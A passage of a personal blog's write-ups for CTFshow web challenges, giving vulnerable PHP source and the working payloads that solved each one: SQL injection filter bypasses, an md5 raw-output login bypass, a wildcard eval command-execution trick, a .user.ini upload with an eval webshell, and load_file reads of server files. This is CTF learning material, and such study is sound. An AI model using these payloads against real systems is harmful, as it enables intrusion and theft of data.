+= <span class="built_in">chr</span>(j)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;数据库名/表名/字段名/数据: %s&#x27;</span> % name)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"> </span><br><span class="line">        <span class="comment"># 如果某个字符不存在,则停止程序,防止继续运行浪费时间</span></span><br><span class="line">        count += <span class="number">1</span></span><br><span class="line">        <span class="keyword">if</span> count &gt;= (<span class="number">128</span> - <span class="number">31</span>):</span><br><span class="line">            exit()</span><br></pre></td></tr></table></figure>

<p>知道了报错注入中substr函数中逗号以及如果要限制显示行数的逗号绕过方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">substr(&#x27;str&#x27;,1,1)--&gt;substr(&#x27;str&#x27; from 1 for 1)</span><br><span class="line">limit 0,1--&gt;limit 1 offset 0</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="http://t.csdn.cn/qeQlL">大佬博客</a></p>
<h2 id="web9（sql注入md5-str-true-类型绕过）"><a href="#web9（sql注入md5-str-true-类型绕过）" class="headerlink" title="web9（sql注入md5($str,true)类型绕过）"></a>web9（sql注入md5($str,true)类型绕过）</h2><p>看到登陆页面，一眼SQL注入，但诸如半天没用，扫目录发现可疑的robots.txt，访问后下载文件拿到一段代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">        $flag=&quot;&quot;;</span><br><span class="line">		$password=$_POST[&#x27;password&#x27;];</span><br><span class="line">		if(strlen($password)&gt;10)&#123;</span><br><span class="line">			die(&quot;password error&quot;);</span><br><span class="line">		&#125;</span><br><span class="line">		$sql=&quot;select * from user where username =&#x27;admin&#x27; and password =&#x27;&quot;.md5($password,true).&quot;&#x27;&quot;;</span><br><span class="line">		$result=mysqli_query($con,$sql);</span><br><span class="line">			if(mysqli_num_rows($result)&gt;0)&#123;</span><br><span class="line">					while($row=mysqli_fetch_assoc($result))&#123;</span><br><span class="line">						 echo &quot;登陆成功&lt;br&gt;&quot;;</span><br><span class="line">						 echo $flag;</span><br><span class="line">					 &#125;</span><br><span class="line">			&#125;</span><br><span class="line">    ?&gt;</span><br></pre></td></tr></table></figure>

<p>这段代码意思就是password长度必须小于10，并且写入的password会经过md516字符二进制加密，所以必须找一个字符串经过md516字符二进制加密后，再转化为字符串为一句SQL注入的话语，找不到，看大佬，得到一个字符串:ffifdyop，加密后转化为字符串为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; &#x27; &#x27;or&#x27; 6&lt;trach&gt;</span><br></pre></td></tr></table></figure>

<p>这相当于一个万能密码，由于6为真，那么结果一定为真，也就绕过了。</p>
<p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/e37e26d2ba7f">大佬博客</a></p>
<h2 id="web10（sql注入通过group-by-…-with-rollup绕过）"><a href="#web10（sql注入通过group-by-…-with-rollup绕过）" class="headerlink" title="web10（sql注入通过group by … with rollup绕过）"></a>web10（sql注入通过group by … with rollup绕过）</h2><p>进入页面，发现诸如很久都没有用，点击取消后拿到源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">		<span class="variable">$flag</span>=<span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">replaceSpecialChar</span>(<span class="params"><span class="variable">$strParam</span></span>)</span>&#123;</span><br><span class="line">             <span class="variable">$regex</span> = <span class="string">&quot;/(select|from|where|join|sleep|and|\s|union|,)/i&quot;</span>;</span><br><span class="line">             <span class="keyword">return</span> <span class="title function_ invoke__">preg_replace</span>(<span class="variable">$regex</span>,<span class="string">&quot;&quot;</span>,<span class="variable">$strParam</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="variable">$con</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;Could not connect: &#x27;</span> . <span class="title function_ invoke__">mysqli_error</span>());</span><br><span class="line">        &#125;</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$username</span>)!=<span class="title function_ invoke__">strlen</span>(<span class="title function_ invoke__">replaceSpecialChar</span>(<span class="variable">$username</span>)))&#123;</span><br><span class="line">			<span class="keyword">die</span>(<span class="string">&quot;sql inject error&quot;</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$password</span>)!=<span class="title function_ invoke__">strlen</span>(<span class="title function_ invoke__">replaceSpecialChar</span>(<span class="variable">$password</span>)))&#123;</span><br><span class="line">			<span class="keyword">die</span>(<span class="string">&quot;sql inject error&quot;</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="variable">$sql</span>=<span class="string">&quot;select * from user where username = &#x27;<span class="subst">$username</span>&#x27;&quot;</span>;</span><br><span class="line">		<span class="variable">$result</span>=<span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$con</span>,<span class="variable">$sql</span>);</span><br><span class="line">			<span class="keyword">if</span>(<span class="title function_ invoke__">mysqli_num_rows</span>(<span class="variable">$result</span>)&gt;<span class="number">0</span>)&#123;</span><br><span class="line">					<span class="keyword">while</span>(<span class="variable">$row</span>=<span class="title function_ invoke__">mysqli_fetch_assoc</span>(<span class="variable">$result</span>))&#123;</span><br><span class="line">						<span class="keyword">if</span>(<span class="variable">$password</span>==<span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>])&#123;</span><br><span class="line">							<span class="keyword">echo</span> <span class="string">&quot;登陆成功&lt;br&gt;&quot;</span>;</span><br><span class="line">							<span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">						&#125;</span><br><span class="line"></span><br><span class="line">					 &#125;</span><br><span class="line">			&#125;</span><br><span class="line">    <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>首先知道这道题将几乎所有SQL语句都过滤了，并且是直接删除，当然这里可以双写绕过，但是后面语句会对输入语句和过滤后的语句进行对比，长度不相等就报错，所以双写绕过被防御了，继续看代码后面知道最后还要验证password，只有当username和password都正确时才能登入，这时可以用到group by … with rollup。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">group by ...  //将...中的值进行排列</span><br><span class="line">在后面加上with rollup     //将刚刚排列的值进行汇总，由于password并不是数字类型而是字符串类型，所以并不能汇总，会在末尾添加一个NULL，当然如果是数字类型那么就会添加一行汇总。</span><br></pre></td></tr></table></figure>

<p>这时我们就相当于注入了一个密码空，由于数据库只验证密码，所以用户可以随便，但注入语句须在用户中，因为要保证密码为空。</p>
<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=admin&#x27;/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&amp;password=</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/104351624">大佬博客</a></p>
<h2 id="web11（session绕过）"><a href="#web11（session绕过）" class="headerlink" title="web11（session绕过）"></a>web11（session绕过）</h2><p>打开页面看到源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">replaceSpecialChar</span>(<span class="params"><span class="variable">$strParam</span></span>)</span>&#123;</span><br><span class="line">             <span class="variable">$regex</span> = <span class="string">&quot;/(select|from|where|join|sleep|and|\s|union|,)/i&quot;</span>;</span><br><span class="line">             <span class="keyword">return</span> <span class="title function_ invoke__">preg_replace</span>(<span class="variable">$regex</span>,<span class="string">&quot;&quot;</span>,<span class="variable">$strParam</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$password</span>)!=<span class="title function_ invoke__">strlen</span>(<span class="title function_ invoke__">replaceSpecialChar</span>(<span class="variable">$password</span>)))&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;sql inject error&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$password</span>==<span class="variable">$_SESSION</span>[<span class="string">&#x27;password&#x27;</span>])&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;error&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    <span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里依然将几乎所有的SQL注入语句都过滤了，这里看到验证password使用的是session_id进行验证的，<a target="_blank" rel="noopener" href="https://blog.csdn.net/sm20170867238/article/details/90745969">看看session是什么</a>，每一个登录用户都会得到一个session_id，系统验证此id进行登录，也就相当于一个令牌，我们不知道正确的令牌是什么，但是如果我们的令牌刚好为空，密码也刚好为空，那么是不是这两个变量就相等了呢，不就绕过了session了吗，结果确实绕过了。</p>
<h2 id="web12（eval危险函数注入利用）"><a href="#web12（eval危险函数注入利用）" class="headerlink" title="web12（eval危险函数注入利用）"></a>web12（eval危险函数注入利用）</h2><p>打开源码，发现了?cmd&#x3D;   ，写入php代码发现有回显，那么就可以查看目录文件了，由于system()函数没有回显，也就不能直接命令执行，但是这里提供两个能够查看所有文件的函数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">glob(&quot;*&quot;)  //返回匹配指定模式的文件名或目录</span><br><span class="line">scandir(&quot;.&quot;)  //查看当前所有的目录文件</span><br></pre></td></tr></table></figure>

<p>echo一下发现是数组，那么就用print_r或者var_dump</p>
<p>echo，print，print_r，var_dump 的区别:</p>
<p><strong>1.echo</strong></p>
<p>输出一个或者多个字符串。</p>
<p><strong>2.print</strong></p>
<p>和 echo 最主要的区别： print 仅支持一个参数，并总是返回 1。</p>
<p><strong>3.print_r</strong></p>
<p>打印关于变量的易于理解的信息,如果给出的是 string、integer 或 float，将打印变量值本身。如果给出的是  array，将会按照一定格式显示键和元素。object 与数组类似。 记住，print_r() 将把数组的指针移到最后边。使用 reset()  可让指针回到开始处。</p>
<p><strong>4.var_dump</strong></p>
<p>此函数显示关于一个或多个表达式的结构信息，包括表达式的类型与值。数组将递归展开值，通过缩进显示其结构。</p>
<p><strong>5.var_dump 和 print_r 的区别</strong></p>
<p>var_dump 返回表达式的类型与值而 print_r 仅返回结果，相比调试代码使用 var_dump 更便于阅读</p>
<p>拿到一个很长文件名的php文件，使用show_source函数查看即可。</p>
<h2 id="红包题第二弹"><a href="#红包题第二弹" class="headerlink" title="红包题第二弹"></a>红包题第二弹</h2><p>在cmd后面随便输什么，爆出来了源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]))&#123;</span><br><span class="line">            <span class="variable">$cmd</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line">            <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[A-Za-oq-z0-9$]+/&quot;</span>,<span class="variable">$cmd</span>))&#123;</span><br><span class="line">            </span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;cerror&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/\~|\!|\@|\#|\%|\^|\&amp;|\*|\(|\)|\（|\）|\-|\_|\&#123;|\&#125;|\[|\]|\&#x27;|\&quot;|\:|\,/&quot;</span>,<span class="variable">$cmd</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;serror&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">eval</span>(<span class="variable">$cmd</span>);</span><br><span class="line">        </span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">     <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里除了字母p、加号、单反引号、问号、;和&#x2F;外全过滤了，不知道怎么做，跟着<a target="_blank" rel="noopener" href="https://blog.51cto.com/m0re/3879012">大佬</a>做，有了问号就可以考虑通过通配符执行文件，大佬说php以post上传的文件会暂存到&#x2F;tmp&#x2F;phpxxxxxx内，后面六个是随机命名的字母，由于点号没有被过滤，就可以通过点号代替source执行文件，在文件中写入# &#x2F;bin&#x2F;sh就可以不需要权限进行任意代码执行了，而&lt;?可以代替echo，+可以代替空格，那么就可以构造payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=?&gt;&lt;?=`.+/??p/p?p??????`;</span><br></pre></td></tr></table></figure>

<p>在本地写一个文件上传页面，上传时抓包改执行指令即可：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf -8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>POST数据<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;http://2e32d383-ce02-4da3-ab3c-dcea9d439dc0.challenge.ctf.show/&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span> <span class="attr">enctype</span>=<span class="string">&quot;multipart/form-data&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">label</span> <span class="attr">for</span>=<span class="string">&quot;file&quot;</span>&gt;</span>文件名：<span class="tag">&lt;/<span class="name">label</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;file&quot;</span> <span class="attr">name</span>=<span class="string">&quot;file&quot;</span> <span class="attr">id</span>=<span class="string">&quot;file&quot;</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">name</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;提交&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2023/06/04/CTFshow/%E7%BA%A2%E5%8C%85%E9%A2%98%E7%AC%AC%E4%BA%8C%E5%BC%B9.png"></p>
<p>注意文件目录以及通配符的使用。</p>
<h2 id="web13（-user-ini文件上传）"><a href="#web13（-user-ini文件上传）" class="headerlink" title="web13（.user.ini文件上传）"></a>web13（.user.ini文件上传）</h2><p>由于这道题限制了文件大小，并且过滤了php，先尝试拿到源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">	<span class="title function_ invoke__">header</span>(<span class="string">&quot;content-type:text/html;charset=utf-8&quot;</span>);</span><br><span class="line">	<span class="variable">$filename</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">	<span class="variable">$temp_name</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">	<span class="variable">$size</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;size&#x27;</span>];</span><br><span class="line">	<span class="variable">$error</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;error&#x27;</span>];</span><br><span class="line">	<span class="variable">$arr</span> = <span class="title function_ invoke__">pathinfo</span>(<span class="variable">$filename</span>);</span><br><span class="line">	<span class="variable">$ext_suffix</span> = <span class="variable">$arr</span>[<span class="string">&#x27;extension&#x27;</span>];</span><br><span class="line">	<span class="keyword">if</span> (<span class="variable">$size</span> &gt; <span class="number">24</span>)&#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">&quot;error file zise&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (<span class="title function_ invoke__">strlen</span>(<span class="variable">$filename</span>)&gt;<span class="number">9</span>)&#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">&quot;error file name&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$ext_suffix</span>)&gt;<span class="number">3</span>)&#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">&quot;error suffix&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/php/i&quot;</span>,<span class="variable">$ext_suffix</span>))&#123;</span><br><span class="line">		<span class="keyword">die</span>(<span class="string">&quot;error suffix&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/php/i&quot;</span>),<span class="variable">$filename</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;error file name&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">	<span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_name</span>, <span class="string">&#x27;./&#x27;</span>.<span class="variable">$filename</span>))&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;文件上传成功！&quot;</span>;</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;文件上传失败！&quot;</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line"> <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="user-ini"><a href="#user-ini" class="headerlink" title=".user.ini"></a>.user.ini</h4><p>过滤php并且文件大小不得超过24后缀不得大于3，这里考虑上传txt文件，然后使用.user.ini修改配置，使得传入的木马被解析</p>
<p>自 PHP 5.3.0 起，PHP 支持基于每个目录的 INI 文件配置。此类文件 <em>仅</em>被 CGI／FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里，则用 .htaccess 文件有同样效果。 </p>
<p>.htaccess是伪静态环境配置文件，用于lamp。  .user.ini是lnmp文件，里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取.  配置 放在根目录 .user.ini </p>
<p>两个PHP方法：</p>
<p>auto_prepend_file:在页面顶部加载文件</p>
<p>auto_append_file:在页面底部加载文件</p>
<p>根据要求传入木马(1.txt)：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eval($_GET[&#x27;a&#x27;]);   //get方式上传执行指令</span><br><span class="line">&lt;?php eval($_POST[&#x27;a&#x27;]);   //post方式上传执行指令</span><br></pre></td></tr></table></figure>

<p>上传.user.ini:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file=1.txt</span><br></pre></td></tr></table></figure>

<p>由于没有拿到后门权限，所有可以直接在网页以get或post方式查看文件最后拿到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a=print_r(glob(&quot;*&quot;));</span><br><span class="line">a=highlight(&quot;flag的名字&quot;);</span><br></pre></td></tr></table></figure>

<h2 id="web14（sql注入，过滤少许语句，load-file函数下载数据库文件）"><a href="#web14（sql注入，过滤少许语句，load-file函数下载数据库文件）" class="headerlink" title="web14（sql注入，过滤少许语句，load_file函数下载数据库文件）"></a>web14（sql注入，过滤少许语句，load_file函数下载数据库文件）</h2><p>首先进入，发现在c&#x3D;3时会输出url，提示here_1s_your_f1ag.php文件直接进入，简单尝试一下sql注入，这里发现是一个没有引号过滤：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">information_schema\.tables|information_schema\.columns|linestring| |polygon/is</span><br></pre></td></tr></table></figure>

<p>绕过：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">空格： /**/</span><br><span class="line">information_schema.tables等:   information_schema.`tables`</span><br></pre></td></tr></table></figure>

<p>但是提示这是一个秘密，那么应该在开始的secret.php里，查看：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0/**/union/**/select/**/load_file(&#x27;/var/www/html/secret.php&#x27;)</span><br></pre></td></tr></table></figure>

<p>提示文件&#x2F;real_flag_is_here，直接再次访问：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0/**/union/**/select/**/load_file(&#x27;/real_flag_is_here&#x27;)</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://hshdgyq.github.io">Six_plum</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://hshdgyq.github.io/2023/06/04/CTFshow/">https://hshdgyq.github.io/2023/06/04/CTFshow/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://hshdgyq.github.io" target="_blank">Six_plum</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a></div><div class="post_share"><div class="social-share" data-image="/img/ctfshow.gif" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2023/10/02/NewStarCTF2023-web/"><img class="prev-cover" src="/img/NewStarCTF2023.jpeg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">NewStarCTF2023 web</div></div></a></div><div class="next-post pull-right"><a href="/2023/05/16/LitCTF%E5%A4%8D%E7%8E%B0/"><img class="next-cover" src="/img/LitCTF.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">LitCTF复现</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2023/11/21/NSSCTF/" title="NSSCTF"><img class="cover" src="/img/better.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2023-11-21</div><div class="title">NSSCTF</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/header.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Six_plum</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">26</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">9</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">5</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/hshdgyq"><i class="fab fa-github"></i><span>github</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/hshdgyq" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:1952023661@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">记录一些刷题日志，防止走丢。</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CTFshow"><span class="toc-number">1.</span> <span class="toc-text">CTFshow</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#web1"><span class="toc-number">1.1.</span> <span class="toc-text">web1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web2%EF%BC%88%E7%AE%80%E5%8D%95sql%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">1.2.</span> <span class="toc-text">web2（简单sql注入）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web3%EF%BC%88PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%EF%BC%89"><span class="toc-number">1.3.</span> <span class="toc-text">web3（PHP伪协议）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web4%EF%BC%88%E6%97%A5%E5%BF%97UA%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">1.4.</span> <span class="toc-text">web4（日志UA注入）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web5%EF%BC%88md5%E5%BC%B1%E6%AF%94%E8%BE%83%EF%BC%89"><span class="toc-number">1.5.</span> <span 